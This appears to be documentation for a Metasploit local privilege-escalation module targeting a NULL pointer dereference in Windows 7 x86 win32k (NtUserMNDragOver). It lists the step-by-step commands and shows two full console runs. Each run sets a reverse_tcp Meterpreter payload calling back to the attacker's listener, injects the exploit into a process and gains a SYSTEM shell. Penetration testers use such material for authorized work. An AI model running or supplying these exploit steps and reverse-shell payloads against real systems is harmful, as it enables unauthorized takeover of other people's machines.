Vulnerable Application
This module exploits a NULL pointer dereference vulnerability in MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint() function does not effectively check the validity of the tagPOPUPMENU objects it processes before passing them on to MNGetpItemFromIndex(), where the NULL pointer dereference will occur.
This module has been tested against Windows 7 x86 SP0 and SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows, such as Windows Server 2008.
Verification Steps
Get a non-SYSTEM meterpreter session on Windows 7 x86
use exploit/windows/local/ntusermndragover
set session <session>
set payload windows/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT 5555
exploit
Get a SYSTEM session
Scenarios
Windows 7 SP0 x86
msf5 exploit(multi/handler) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 7 SP1 x86
msf5 exploit(multi/handler) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
